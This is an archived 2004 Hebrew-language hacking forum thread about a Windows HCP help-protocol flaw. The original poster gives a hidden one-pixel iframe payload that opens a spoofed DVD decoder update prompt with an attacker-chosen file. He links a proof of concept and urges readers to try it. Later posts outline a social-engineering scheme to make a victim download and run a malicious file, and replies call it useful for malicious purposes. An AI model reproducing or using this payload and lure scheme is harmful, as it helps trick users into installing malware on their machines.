Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > באג מאוד נחמד בפרוטוקול HCP.

2004-05-13 23:53 cp77fk4r
http://www.exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt
(ראיתי בחדשות של BInaryVision את החדשה הזאת- תודה).

הפרוטוקול HCP זה פרוטוקול עזרה שנמצא על המערכת וינדוס.
הבאג נמצא בבדיקה של "מאיפה יורד אעידכון" ובגלל שפשוט אין בדיקה כזאת, אפשר לזייף עידכון ולגרום לבעל המחשב להוריד אותו ולהריץ (זה מאוד יכול לעזור להנדסה חברתית, כי זה ניראה מאוד אמיתי).

פשוט תיצרו עמוד HTML עם הקוד הזה בתוכו:

<iframe
[src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=[File"
width="1" height="1">
</iframe

(את ה[File] תשנו לכתובת של הזיוף של העידכון).


זהו, עכשיו כל מי שיכנס אליו זה יקפיץ לו הודעה בוינדוס של "יש עידכון חדש לDVD Decoder ובלה בלה בלה"
וכשהוא ילחץ על "הורד" זה יוריד לו את העידכון והוא יחשוב שזה מוריד עידכון אמיתי, ככה גם הוא יותר יאמין ויתפתה ללחוץ עליו, ככה שאפשר להכין קובץ זדוני ולעשות חגיגה.


למי שרוצה לנסות את זה:
http://exploitlabs.com/msnspoof/poc/index2.html


תהנו.


הקרדיט מגיע לDonnie Werner מISS.

2004-05-14 02:56 cp77fk4r
עוד קצת מידע:

http://www.updatexp.com/kb825119.html
2004-05-15 15:24 Dorown
תודה, ניראה באג נחמד ביותר :)
2004-05-16 01:02 cp77fk4r
הבאג עצמו לא הכי נחמד, אבל הוא יכול להיות מאוד שימושי ;)

תשמרו על עצמכם.
2004-05-16 13:10 Double D
וואי איזה נחמד זה

הוא באמת יכול להיות שימושי לצרכים זדוניים טחח

ומפתאום אנלא מוריד תעדכונים של הדבר הזה לא משתמש בוא ממילא
2004-05-16 23:41 cp77fk4r
אבל עדיין, זאת אחלה של דרך לגרום למישהו להוריד קובץ ספציפי ולהריץ אותו...

אתה יכול להכין תוכנה שכותבת שהיא צריכה עידכון מסויים של הדבר הזה, ואז הוא יגיד לך שהוא צריך עידכון לאיזה דבר (שזה זה) ואז תביא לו לינק (העמוד שהכנת מראש) והוא יוריד.. יריץ.. ואופ :)
עמודים: 1